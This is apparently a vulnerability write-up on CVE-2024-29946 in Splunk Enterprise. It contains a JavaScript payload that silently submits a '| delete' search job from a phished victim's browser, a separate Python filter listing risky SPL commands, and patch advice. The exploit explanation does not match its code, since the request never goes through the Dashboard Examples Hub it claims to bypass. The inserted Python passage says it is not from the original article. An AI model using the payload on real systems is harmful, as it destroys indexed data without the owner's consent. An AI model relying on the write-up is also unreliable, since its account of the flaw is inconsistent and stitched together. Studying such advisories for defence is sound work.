Recently, a security vulnerability (CVE-2024-29946) was found in Splunk Enterprise versions below 9.0.9, 9.1.4 and 9.2.1. In these versions the Dashboard Examples Hub lacks crucial protections for risky SPL (Search Processing Language) commands. A potential attacker could exploit this vulnerability by bypassing the SPL safeguards for risky commands present in the Hub. To do so, the attacker would need to carry out a phishing attack and trick the victim into initiating the request from their browser. In this article, we will delve into the technical details of CVE-2024-29946 and show a sample code snippet for the exploit.

Exploit Details

The security issue (CVE-2024-29946) arises from insufficient protection for potentially dangerous SPL commands in the Dashboard Examples Hub. The code snippet below demonstrates how an attacker could bypass the SPL safeguards to execute a risky command.

//Sample Code Snippet
<script>
  // Sends a search job request to the victim's Splunk instance from the victim's browser.
  // <SPLUNK_ENTERPRISE_INSTANCE> is a placeholder for the target host.
  function exploit() {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://<SPLUNK_ENTERPRISE_INSTANCE>/en-US/splunkd/__raw/services/search/jobs', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    // URL-encoded form body: search="| delete", exec_mode=normal
    var payload = 'search=%7C%20delete&exec_mode=normal';
    xhr.send(payload);
  }
  exploit();
</script>

The code snippet above shows a simple JavaScript function, exploit(), which sends an XMLHttpRequest (XHR) POST request to create a new search job on the Splunk Enterprise instance. The payload, sent as the search parameter of the POST request, contains the risky SPL command, 'delete' in this case. When this exploit is executed, the delete command bypasses the SPL safeguard within the Dashboard Examples Hub, leading to potential data loss or other dangerous outcomes.
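As an added example (not code from the original article or from Splunk), the following Python check illustrates the kind of server-side safeguard the Hub lacked: it decodes a search-job POST body like the one above, splits the SPL pipeline on unquoted pipes, and refuses any request whose stages begin with a risky command. The RISKY_COMMANDS set is an illustrative assumption, not Splunk's configured list.

```python
from urllib.parse import parse_qs

# Illustrative subset of commands treated as "risky"; the real list is
# configurable in Splunk, so this set is an assumption for the demo.
RISKY_COMMANDS = {"delete", "collect", "outputlookup", "runshellscript",
                  "script", "sendemail"}


def split_pipeline(spl: str) -> list[str]:
    """Split an SPL string on unquoted '|' into its pipeline stages."""
    stages, current, quote = [], [], None
    for ch in spl:
        if quote:                      # inside a quoted string: copy verbatim
            current.append(ch)
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):         # opening quote
            quote = ch
            current.append(ch)
        elif ch == "|":                # unquoted pipe ends the stage
            stages.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    stages.append("".join(current).strip())
    return [s for s in stages if s]    # drop empty stages, e.g. a leading "|"


def risky_commands_in(spl: str) -> list[str]:
    """Return the risky command names that start any stage of the search."""
    found = []
    for stage in split_pipeline(spl):
        name = stage.split(None, 1)[0].lower()
        if name in RISKY_COMMANDS:
            found.append(name)
    return found


def check_search_job_request(body: str) -> tuple[bool, list[str]]:
    """Decode a form-encoded search-job body and decide whether it may run.

    Returns (allowed, risky_commands). A constructed body such as
    'search=%7C%20delete&exec_mode=normal' is rejected because its
    only stage is the risky 'delete' command.
    """
    params = parse_qs(body, keep_blank_values=True)
    search = params.get("search", [""])[0]
    found = risky_commands_in(search)
    return (not found, found)
```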

To protect yourself from this vulnerability, do the following:

1. Upgrade to Splunk Enterprise versions that are not vulnerable to CVE-2024-29946, which include 9.0.9 or higher, 9.1.4 or higher, and 9.2.1 or higher. Please check the official Splunk Security Advisory for more information: Splunk Security Advisory for CVE-2024-29946

Conclusion

CVE-2024-29946 is a significant security vulnerability that can allow attackers to bypass SPL safeguards in the Dashboard Examples Hub of the affected Splunk Enterprise versions. By leveraging phishing techniques, hackers can exploit this vulnerability to execute risky SPL commands, potentially causing detrimental consequences. It is recommended to upgrade to the latest, patched Splunk Enterprise versions and to be extra cautious against phishing attacks to mitigate the risks associated with this security flaw.

Timeline

Published on: 03/27/2024 17:15:54 UTC
Last modified on: 04/10/2024 01:15:18 UTC